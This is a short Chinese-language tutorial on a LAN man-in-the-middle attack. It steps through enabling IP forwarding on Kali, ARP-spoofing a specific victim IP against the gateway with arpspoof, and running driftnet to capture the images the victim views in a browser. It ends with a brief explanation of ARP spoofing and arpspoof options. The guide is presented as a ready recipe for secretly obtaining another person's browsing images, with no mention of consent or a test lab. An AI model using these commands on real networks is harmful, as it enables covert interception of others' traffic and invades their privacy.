内网渗透之其他电脑相册获取
工具准备:
kali虚拟机
- 设定ip转发
终端模式输入命令
echo 1 >/proc/sys/net/ipv4/ip_forward注意:当机器网络重新启动,这个数字会回复default=0.如果需要永久修改可以更改/etc/sysctl.conf文件中的ip_forward=1.
2. 进行伪装
arpspoof -i eth0 -t 192.168.43.209 192.168.43.1-t 后跟指定的攻击目标,后面的192.168.43.1是网关,如果攻击多个可以接着写-t 目标ip
- 新打开一个终端,输入命令,进行查看
driftnet -i eth0到此,教程结束,只要目标电脑在浏览器浏览图片都会同步到你本机上.
下面附上ARP欺骗简介:
地址解析协议(ARP),全称 Address Resolution Protocol ,是一个位于TCP/IP协议栈中的网络层.当局域网内计算机间(或者是计算机与网关间)需要通信时,使用ARP协议获取目标IP地址对应的MAC地址,然后计算机再通过MAC地址完成数据包的发送,ARP欺骗一般目的是把自己伪装成网关从而欺骗目标机器,使本应发送到真实网关的数据包发送到欺骗者的机器.
攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目.
arpspoof用法
arpspoof [-i interface] [-c own|host|both] [-t targer] [-r] host
参数:
-i 指定攻击机的网络接口
-t 指定ARP攻击的目标,如果不指定,则目标为该局域网内所有的机器,可以同时指定多个目标
注:部分内容来源于网络.